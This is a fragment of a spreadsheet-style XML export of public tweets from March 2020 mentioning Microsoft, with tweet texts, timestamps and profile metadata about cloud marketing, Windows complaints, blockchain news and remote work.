'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/822310284446482432/MHABVeHh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/822310284446482432/MHABVeHh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/821922190459342848/1484888979',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</si>
  <si>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11:45:04 +0000 2020</t>
  </si>
  <si>
    <t>BUILD YOUR AZURE EXPERTISE WITH ROLE-BASED TRAINING. BE CLOUD EMPOWERED
New Horizons is here to help you gain the deep technical expertise you need to advance in your role. 
Start learning today: https://t.co/67n3Hd74q4
#Microsoft #Azure #Cloud #RoleBased #Carreer #ITTraining https://t.co/1h4ii21hMy</t>
  </si>
  <si>
    <t>{'id': 4217925861, 'id_str': '4217925861', 'name': 'New Horizons Prague', 'screen_name': 'NHPrague', 'location': 'Prague, Czech Republic', 'description': 'Trusted partner for your training &amp; certification experience. World class training provider for Microsoft, Cisco, Security, ITIL, PM, Leadership, and more!', 'url': 'https://t.co/GcbRyXkBWl', 'entities': {'url': {'urls': [{'url': 'https://t.co/GcbRyXkBWl', 'expanded_url': 'http://en.newhorizons.cz', 'display_url': 'en.newhorizons.cz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 265, 'friends_count': 1424, 'listed_count': 25, 'created_at': 'Wed Nov 18 12:47:20 +0000 2015', 'favourites_count': 373, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2720,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'http://pbs.twimg.com/profile_images/1002172229763960832/8qcDBrUL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1002172229763960832/8qcDBrUL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4217925861/1553719954',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</si>
  <si>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11:45:00 +0000 2020</t>
  </si>
  <si>
    <t>How to get started with #AzureStack and build a #Microsoft #PrivateCloud ? Todd Thomas introduces the #HPE Services portfolio to help customers in their transformation journey
Global #Hybridcloud Summit 2020
#Social4UTV #HPEinfluencer @HPE_PointNext https://t.co/4SFfkUCqL3</t>
  </si>
  <si>
    <t>Thu Mar 05 11:41:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is developing a new version of their operating system, Windows 10X, which is designed for dual-screen devices but will very likely be brought to all devices eventually.
Read https://t.co/w2h6KTj9iV for more information. 
#Microsoft #windows10x #NEW #Laptops #dualscreen https://t.co/BBRdZMIFAr</t>
  </si>
  <si>
    <t>{'id': 360533111, 'id_str': '360533111', 'name': 'Direction Forward', 'screen_name': 'direction4ward', 'location': 'London E1', 'description': 'Digital deciphered! We work with you on how to best leverage digital technologies to deliver maximum value. DMs open for enquiries and support.', 'url': 'https://t.co/PjNsBBFmMq', 'entities': {'url': {'urls': [{'url': 'https://t.co/PjNsBBFmMq', 'expanded_url': 'http://directionforward.com', 'display_url': 'directionforward.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 393, 'friends_count': 930, 'listed_count': 14, 'created_at': 'Tue Aug 23 10:57:27 +0000 2011', 'favourites_count': 212, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2606, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '121111', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1096029403929288704/gNcl6ZNF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096029403929288704/gNcl6ZNF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/360533111/1550149022', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'F5F5F5', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 11:41:26 +0000 2020</t>
  </si>
  <si>
    <t>Advaiya hosted another packed @Microsoft Power BI #DashboardinaDay at Mumbai. Thank you for attending the workshop; we hope you enjoyed the experience. 
#DataAnalytics #BusinessAnalytics #DataScience #Data #PowerBI #BI #Analytics #Technology #Microsoft #DataVisualization https://t.co/uT19rDroBB</t>
  </si>
  <si>
    <t>{'id': 1258721024, 'id_str': '1258721024', 'name': 'Advaiya', 'screen_name': 'Advaiyasolns', 'location': 'United States', 'description': 'MAKING TECHNOLOGY WORK â€“ Tailored digital transformation solutions with business applications and analytics.', 'url': 'http://t.co/xGPj9q2mKz', 'entities': {'url': {'urls': [{'url': 'http://t.co/xGPj9q2mKz', 'expanded_url': 'http://www.advaiya.com', 'display_url': 'advaiya.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 828, 'friends_count': 78, 'listed_count': 356, 'created_at': 'Mon Mar 11 06:10:30 +0000 2013', 'favourites_count': 310, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2602,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'http://pbs.twimg.com/profile_images/536748549489168384/8UuiyWny_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/536748549489168384/8UuiyWny_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1258721024/1583405533', 'profile_link_color': 'DA2037',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</si>
  <si>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11:40:53 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft google and youtube and playback and chrome engine and audio issues right now and heavy and bad thumbnail's and slow down</t>
  </si>
  <si>
    <t>Thu Mar 05 11:40:49 +0000 2020</t>
  </si>
  <si>
    <t>3 hours later and Im still waiting for #windows to update. Why is #Microsoft so shite at these things? Im glad I dont personally use this rubbish. https://t.co/5qtSdwrOhq</t>
  </si>
  <si>
    <t>{'id': 15929575, 'id_str': '15929575', 'name': 'ernmander', 'screen_name': 'ernmander', 'location': 'Oxfordshire, UK', 'description': 'I created the @AudioMo challenge #AudioMo . Advocate of @ubports User of @ubuntu @elementary &amp; @system76 #linux Iâ€™m the creator of @Didcot &amp; @Oxon', 'url': 'https://t.co/Z3VLlHyaQL', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z3VLlHyaQL', 'expanded_url': 'http://ernmander.com', 'display_url': 'ernmander.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2299, 'friends_count': 1116, 'listed_count': 231, 'created_at': 'Thu Aug 21 09:36:56 +0000 2008', 'favourites_count': 1905, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 186952,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'http://pbs.twimg.com/profile_images/378800000862592909/u-H8vzdE_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000862592909/u-H8vzdE_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15929575/1428413466',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</si>
  <si>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11:40:05 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus
Tech Firms That Usually Prefer #OnSite
Work are Rethinking That
#Virus is doing for #Tech firms what no
other argument for #Remote Work
apparently could
#Google, #Microsoft, #Facebook, #Twitter,
etc. asking #employees to work from #home
https://t.co/KcD8oSLXVQ</t>
  </si>
  <si>
    <t>{'id': 296160705, 'id_str': '296160705', 'name': 'John Gale', 'screen_name': 'Carverlon', 'location': 'Silicon Valley and London.', 'description': 'Advisor to Startups - Silicon Valley veteran helps startups &amp; investors achieve commercialization and corporate development goals.  Blog', 'url': 'https://t.co/cvoJWVxjfk', 'entities': {'url': {'urls': [{'url': 'https://t.co/cvoJWVxjfk', 'expanded_url': 'http://www.Carverlon.com', 'display_url': 'Carverlon.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1639, 'friends_count': 1600, 'listed_count': 87, 'created_at': 'Tue May 10 09:14:15 +0000 2011', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8741,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'http://pbs.twimg.com/profile_images/701821225899847680/QQD27oTC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/701821225899847680/QQD27oTC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/296160705/1505570597',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</si>
  <si>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11:37:49 +0000 2020</t>
  </si>
  <si>
    <t>Red Hat &amp;amp; Microsoft are a great team. Find out why in our latest video with #Microsoft's Karl Davies-Barrett! #Cloud #HybridCloud https://t.co/kTwY0ADk1l</t>
  </si>
  <si>
    <t>{'id': 939071257181646848, 'id_str': '939071257181646848', 'name': 'Julia Einsiedel', 'screen_name': 'JuliaEins', 'location': 'Frankfurt am Main, Deutschland', 'description': 'Sr. Marketing Manager @RedHat, passionate about #WomeninIT, #DigitalTransformation, #SocialMedia &amp; #DigitalMarketing', 'url': 'https://t.co/N3s3bENzi9', 'entities': {'url': {'urls': [{'url': 'https://t.co/N3s3bENzi9', 'expanded_url': 'http://linkedin.com/in/julia-einsiedel', 'display_url': 'linkedin.com/in/julia-einsiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1004, 'friends_count': 901, 'listed_count': 10, 'created_at': 'Fri Dec 08 09:56:49 +0000 2017', 'favourites_count': 1999, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 598,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'http://pbs.twimg.com/profile_images/939073548919898112/xhT-pHFv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/939073548919898112/xhT-pHFv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/939071257181646848/1526750483',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</si>
  <si>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11:34:54 +0000 2020</t>
  </si>
  <si>
    <t>Synergetics would like to Thank you for taking time and joining us for our Cloud Thursday Webinar Series Session on Control your spend on cloud services &amp;amp; maximize the use of resources.
Visit https://t.co/tnTr8QyWEE
#SynergeticsConsulting #CloudThursday #Webinar #azure #microsoft https://t.co/aFV8fGt1OU</t>
  </si>
  <si>
    <t>{'id': 76620046, 'id_str': '76620046', 'name': 'Synergetics Learning &amp; Cloud Consulting', 'screen_name': 'synergetics1', 'location': 'Mumbai', 'description': 'Synergetics is a premium brand in the Indian IT industry with an experience base of over 19 years in the area of people competency development;', 'url': 'http://t.co/t3nw4QzdrR', 'entities': {'url': {'urls': [{'url': 'http://t.co/t3nw4QzdrR', 'expanded_url': 'http://www.synergetics-india.com', 'display_url': 'synergetics-india.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 240, 'friends_count': 271, 'listed_count': 16, 'created_at': 'Wed Sep 23 11:30:35 +0000 2009', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1863,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'http://pbs.twimg.com/profile_images/989743731736698880/PIzgo2U3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989743731736698880/PIzgo2U3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/76620046/1569317034', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FF8F17', 'profile_sidebar_fill_color': 'F5F5F5', 'profile_text_color': '383838', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 11:34:50 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge 80.0.361.66 Stable #EDGE #Microsoft #MicrosoftEdge # # https://t.co/Jm1e8GWNIi https://t.co/A2pyPYpcBx</t>
  </si>
  <si>
    <t>{'id': 31422921, 'id_str': '31422921', 'name': 'Kaldata.com', 'screen_name': 'kaldata', 'location': 'Sofia', 'description': 'ÐÐ°Ð¹-Ð²Ð°Ð¶Ð½Ð¸Ñ‚Ðµ IT Ð½Ð¾Ð²Ð¸Ð½Ð¸ Ð¾Ñ‚ Ð´ÐµÐ½Ñ Ð½Ð° http://t.co/W5f8toLicO', 'url': 'http://t.co/YK6bdUkQqH', 'entities': {'url': {'urls': [{'url': 'http://t.co/YK6bdUkQqH', 'expanded_url': 'http://www.kaldata.com/', 'display_url': 'kaldata.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/W5f8toLicO', 'expanded_url': 'http://Kaldata.com', 'display_url': 'Kaldata.com', 'indices': [33, 55]}]}}, 'protected': False, 'followers_count': 1706, 'friends_count': 137, 'listed_count': 36, 'created_at': 'Wed Apr 15 14:44:02 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 58294,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'http://pbs.twimg.com/profile_images/1114729604/1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114729604/1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/31422921/1550820068', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'E8F1F8', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 11:29:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to deploy ElectionGuard voting software in the first real-world test.
https://t.co/AspwDGjA1C
@ZDNet @Microsoft @Windows @github @AspenSecurity 
#Microsoft #deploy #electionguard #voting #software #first #realworld #test #Fulton #Windows #SupremeCourt #Github #app https://t.co/gfSLNxOOcP</t>
  </si>
  <si>
    <t>{'id': 935323687, 'id_str': '935323687', 'name': 'HostDNS.com ðŸš€', 'screen_name': 'hostdns', 'location': 'VÃ¤sterÃ¥s, Sweden', 'description': 'Premium DNS Anycast Hosting with Cyber Security. Made in Sweden ðŸ‡¸ðŸ‡ªÂ· Account managed by @jonasl', 'url': 'https://t.co/zntMYLAb', 'entities': {'url': {'urls': [{'url': 'https://t.co/zntMYLAb', 'expanded_url': 'https://hostdns.com', 'display_url': 'hostdns.com', 'indices': [0, 21]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 216, 'friends_count': 774, 'listed_count': 9, 'created_at': 'Thu Nov 08 20:04:50 +0000 2012', 'favourites_count': 116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 911,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'http://pbs.twimg.com/profile_images/1106622065552117761/2x1LMZiJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1106622065552117761/2x1LMZiJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/935323687/1552674215',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</si>
  <si>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11:28:13 +0000 2020</t>
  </si>
  <si>
    <t>So the uni is rolling out #Office365 - lad from IT was in the office yesterday, saw me on #Trello and asked why I was still using that, not Planner through Teams. So I tried it out, go this. Nice reminder of why I hate #Microsoft so much. https://t.co/AXAcjvezJQ</t>
  </si>
  <si>
    <t>{'id': 285266017, 'id_str': '285266017', 'name': 'Sonya / @sonya@scholar.social', 'screen_name': 'sonyamcchristie', 'location': "The City of the 'New Castle'", 'description': 'Reader, Writer, Philosopher, Learning Technologist working in UK HE. Possessor of at least two distinct superhuman abilities. Proud to be queer. She/They ðŸ³ï¸\u200dðŸŒˆ', 'url': 'https://t.co/5ZtfKwVnRT', 'entities': {'url': {'urls': [{'url': 'https://t.co/5ZtfKwVnRT', 'expanded_url': 'http://sonya.mcchristie.com', 'display_url': 'sonya.mcchristie.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 224, 'friends_count': 175, 'listed_count': 9, 'created_at': 'Wed Apr 20 20:57:29 +0000 2011', 'favourites_count': 5617, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3126, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F2EEEF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/993826723815985152/qM_By_Ky_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/993826723815985152/qM_By_Ky_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/285266017/1525782436', 'profile_link_color': 'E81C4F', 'profile_sidebar_border_color': '8BA7C4', 'profile_sidebar_fill_color': 'FAFAFA', 'profile_text_color': '8F2E2E', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 11:25:40 +0000 2020</t>
  </si>
  <si>
    <t>Our Dynamics 365 All-Channel Communications Solution, taking Omni-Channel to not just many but any channel you need ! 
https://t.co/1OECYK0WyZ   
#Solgari #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 11:24:00 +0000 2020</t>
  </si>
  <si>
    <t>What are the top 3 questions customers ask about #HybridCloud Adoption? Rui Ramos will reply and will give more insights at the #HPE #Microsoft #HybridCloud Summit today in Lisbon Portugal : Access the slidedeck at  https://t.co/JuaCQWEV37 #Cloud #RightMix #RightMixAdvisor https://t.co/oq50Bfolfh</t>
  </si>
  <si>
    <t>Thu Mar 05 11:23:55 +0000 2020</t>
  </si>
  <si>
    <t>Really delighted to have received the Azure Heroes Community Hero badger for my contributions to the Azure Community!
https://t.co/VBxnQ81fwI
#Microsoft #Azure #AzureHeroes
#Community https://t.co/XoXvCxXfcy</t>
  </si>
  <si>
    <t>{'id': 163012128, 'id_str': '163012128', 'name': 'Wim Matthyssen #AzureSpringClean', 'screen_name': 'wmatthyssen', 'location': 'Belgium', 'description': '#Cloud Architect / #MCT / Board member @mc2mcbe / #Azure / #AzureBackup / #ASC / #AzOps / #AzSec / #HyperV / #PowerShell', 'url': 'https://t.co/2XKIzVLfCz', 'entities': {'url': {'urls': [{'url': 'https://t.co/2XKIzVLfCz', 'expanded_url': 'https://wmatthyssen.com', 'display_url': 'wmatthyssen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 840, 'friends_count': 835, 'listed_count': 154, 'created_at': 'Mon Jul 05 09:10:55 +0000 2010', 'favourites_count': 3864, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7564,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'http://pbs.twimg.com/profile_images/1207332564903563264/4bFZtbS1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207332564903563264/4bFZtbS1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/163012128/1520178949', 'profile_link_color': '1B95E0',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</si>
  <si>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Thu Mar 05 11:20:52 +0000 2020</t>
  </si>
  <si>
    <t>#EY, #Microsoft and #ConsenSys Launch #Enterprise Platform on #Ethereum Mainnet - #Chainlink #ErnstYoung #MakerDAO #SmartContracts #Unibright - https://t.co/TqWaNQuuQg https://t.co/4UlPR3Kxd7</t>
  </si>
  <si>
    <t>Thu Mar 05 11:20:36 +0000 2020</t>
  </si>
  <si>
    <t>@Consensys And EY Working On A New Project Supported By Microsoft And AMD
#Blockchain #Decentralization #Cryptocurrency #ConsenSys #Microsoft #AMD
https://t.co/www54sxS6M</t>
  </si>
  <si>
    <t>{'id': 919873077550358528, 'id_str': '919873077550358528', 'name': 'thecoinrepublic', 'screen_name': 'thecoinrepublic', 'location': '', 'description': 'Thecoinrepublic provides you with the latest Bitcoin news, including other cryptocurrencies, and Latest Trending updates and blockchain news.', 'url': 'https://t.co/Hhwk182ePv', 'entities': {'url': {'urls': [{'url': 'https://t.co/Hhwk182ePv', 'expanded_url': 'http://www.thecoinrepublic.com/', 'display_url': 'thecoinrepublic.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 213, 'friends_count': 446, 'listed_count': 0, 'created_at': 'Mon Oct 16 10:30:06 +0000 2017', 'favourites_count': 946, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2785, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/965513603225763845/WIyVm55B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/965513603225763845/WIyVm55B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/919873077550358528/1519034474',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</si>
  <si>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11:20:34 +0000 2020</t>
  </si>
  <si>
    <t>@Forbes report #Microsoft subdomain vulnerability: the risk is the combination of seemingly legitimate Microsoft domains and #phishing campaigns designed to steal credentials and user data: https://t.co/xhm05hXNs4.
 #securityawareness #ITsecurity #cybersecurity #infosec</t>
  </si>
  <si>
    <t>{'id': 951871831945957376, 'id_str': '951871831945957376', 'name': 'Purplephish', 'screen_name': 'purplephishltd', 'location': 'Manchester, England', 'description': 'Empower users to prevent #cyberattacks via #securityawareness training and real-world #phishing simulations.', 'url': 'https://t.co/vm5rcG9j0D', 'entities': {'url': {'urls': [{'url': 'https://t.co/vm5rcG9j0D', 'expanded_url': 'https://www.purplephish.com', 'display_url': 'purplephish.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 61, 'friends_count': 161, 'listed_count': 1, 'created_at': 'Fri Jan 12 17:41:44 +0000 2018', 'favourites_count': 103, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 456,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'http://pbs.twimg.com/profile_images/965250632444760065/YdQa9bJV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/965250632444760065/YdQa9bJV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/951871831945957376/1518968702', 'profile_link_color': '593C81',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</si>
  <si>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11:17:55 +0000 2020</t>
  </si>
  <si>
    <t>Free #Microsoft #PowerApps template for #Crisis #Communication with Push Notifications for #free for the duration of #Covid19 #Coronavirus https://t.co/Pdzly1LoQE #microsoft365 #microsoftteams #powerplatform https://t.co/CrWUnvC6pA</t>
  </si>
  <si>
    <t>{'id': 141147756, 'id_str': '141147756', 'name': 'JFDI Labs', 'screen_name': 'JFDIConsulting', 'location': 'Brighton, UK', 'description': 'Microsoft Gold Partner, Brighton, UK. SharePoint consultancy, Internet of Things R&amp;D, software engineering, web technologies, middleware, gamified intranets.', 'url': 'https://t.co/7fD7EhQ5r9', 'entities': {'url': {'urls': [{'url': 'https://t.co/7fD7EhQ5r9', 'expanded_url': 'https://jfdi.info', 'display_url': 'jfdi.info', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1014, 'friends_count': 1259, 'listed_count': 35, 'created_at': 'Fri May 07 08:57:13 +0000 2010', 'favourites_count': 2052, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2016,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'http://pbs.twimg.com/profile_images/760510240542556160/lc1QK9Cu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/760510240542556160/lc1QK9Cu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/141147756/1510233363',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</si>
  <si>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11:17:32 +0000 2020</t>
  </si>
  <si>
    <t>If you have realized the potential business benefits of an #erpsoftware for your business, it is time to implement one. Of course, that may be easier said than done. #MIcrosoft  #erpcloud 
https://t.co/qtvyjfM9RZ</t>
  </si>
  <si>
    <t>{'id': 700691013468225536, 'id_str': '700691013468225536', 'name': 'Triangle', 'screen_name': 'TriangleGST', 'location': '', 'description': 'Triangle specializes in #ERP implementation and support of #MsDynNav and #MSDyn365BC business solutions for companies operating worldwide', 'url': 'https://t.co/YFRdqXavVj', 'entities': {'url': {'urls': [{'url': 'https://t.co/YFRdqXavVj', 'expanded_url': 'https://www.triangle.es', 'display_url': 'triangle.es', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 91, 'friends_count': 142, 'listed_count': 30, 'created_at': 'Fri Feb 19 14:38:50 +0000 2016', 'favourites_count': 175, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 528,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'http://pbs.twimg.com/profile_images/1159609046720274437/gjCbvspd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159609046720274437/gjCbvspd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/700691013468225536/1567677292', 'profile_link_color': '009999',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</si>
  <si>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11:15:06 +0000 2020</t>
  </si>
  <si>
    <t>EY, Microsoft and ConsenSys Launch Enterprise Platform on Ethereum Mainnet
https://t.co/ZJLixzkpKA
@Cointelegraph #EY #Microsoft #ConsenSyS #tokenization #Ethereum  #blockchain</t>
  </si>
  <si>
    <t>{'id': 913005725001175040, 'id_str': '913005725001175040', 'name': 'Lendo', 'screen_name': 'Lendo_io', 'location': 'Singapore', 'description': 'Lendo Platform PTE Ltd is a Fintech company enabling lenders to provide fiat loans for cryptocurrency collateral and a cryptobanking ecosystem.', 'url': 'https://t.co/LaG9VquMHp', 'entities': {'url': {'urls': [{'url': 'https://t.co/LaG9VquMHp', 'expanded_url': 'https://www.lendo.io/', 'display_url': 'lendo.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 488, 'friends_count': 136, 'listed_count': 9, 'created_at': 'Wed Sep 27 11:41:42 +0000 2017', 'favourites_count': 87, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5248,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'http://pbs.twimg.com/profile_images/1027103146450083845/O2jxccmt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027103146450083845/O2jxccmt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/913005725001175040/1533715496', 'profile_link_color': '0D0D0D',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</si>
  <si>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11:15:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft bad store and connection and wifi and feedback hub and feedback hub crash and heavy and slow and bad so much</t>
  </si>
  <si>
    <t>Thu Mar 05 11:14:31 +0000 2020</t>
  </si>
  <si>
    <t>@OASystemsLtd and @SolgariConverse announce strategic partnership in New Zealand.
https://t.co/p9mVbgJFdr
#OASystems #Solgari #Business #Microsoft #Innovation #Partnership #ISV #Msdyn365 https://t.co/gbFgW3Cl10</t>
  </si>
  <si>
    <t>Thu Mar 05 11:13:24 +0000 2020</t>
  </si>
  <si>
    <t>How to choose your #Microsoft #AzureStackHCI solutions from the #HPE valided Portfolio :  from ruggedized #IoT #Edge, over industry-standard #Proliant models, or #HCI and #storage-intensive: the broadest portfolio from the industry!
#HybridCloud @daniel_apps #WS19 @MPECSInc https://t.co/WGF8NNf32f</t>
  </si>
  <si>
    <t>Thu Mar 05 11:13:15 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoftbe Thank you! Proud to be a valuable #Microsoft #Partner and have our cloud practices audited and certified. The perfect #Cloud #Migration for our valued customers!</t>
  </si>
  <si>
    <t>{'id': 1105101189518106624, 'id_str': '1105101189518106624', 'name': 'DexMach', 'screen_name': 'dex_mach', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 200, 'listed_count': 0, 'created_at': 'Mon Mar 11 13:40:30 +0000 2019', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1106510912679235584/exa6pyFW_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1106510912679235584/exa6pyFW_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1105101189518106624/1558622818',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</si>
  <si>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11:12:15 +0000 2020</t>
  </si>
  <si>
    <t>Latest news on the US authorities' battle against Huawei suggests further escalation. According to Reuters Huawei shipped prohibited US equipment to Iran back in 2010...
#huawei #us #china #tradewars #hp #microsoft #reuters https://t.co/IxO8kUFhjp</t>
  </si>
  <si>
    <t>{'id': 277986409, 'id_str': '277986409', 'name': 'Theo Aggelopoulos', 'screen_name': 'theo_aggelop', 'location': 'Attiki, Greece', 'description': 'Interested in: Nature, technology, smart gadgets, authentic people\nMoto: Be fearless, never settle for less!\nðŸŽ¼ðŸ›©ðŸ‹ðŸ…ðŸŽðŸŒ…ðŸš´ðŸ–,ðŸ”ðŸžðŸ¹ðŸ“·', 'url': 'https://t.co/O1dLov3UfF', 'entities': {'url': {'urls': [{'url': 'https://t.co/O1dLov3UfF', 'expanded_url': 'http://www.linkedin.com/in/theodoreaggelopoulos', 'display_url': 'linkedin.com/in/theodoreaggâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 332, 'friends_count': 313, 'listed_count': 14, 'created_at': 'Wed Apr 06 11:23:07 +0000 2011', 'favourites_count': 1008, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5670,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'http://pbs.twimg.com/profile_images/885167868924637203/pv3uKIdW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/885167868924637203/pv3uKIdW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/277986409/1454090537', 'profile_link_color': '0084B4',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</si>
  <si>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Thu Mar 05 11:11:29 +0000 2020</t>
  </si>
  <si>
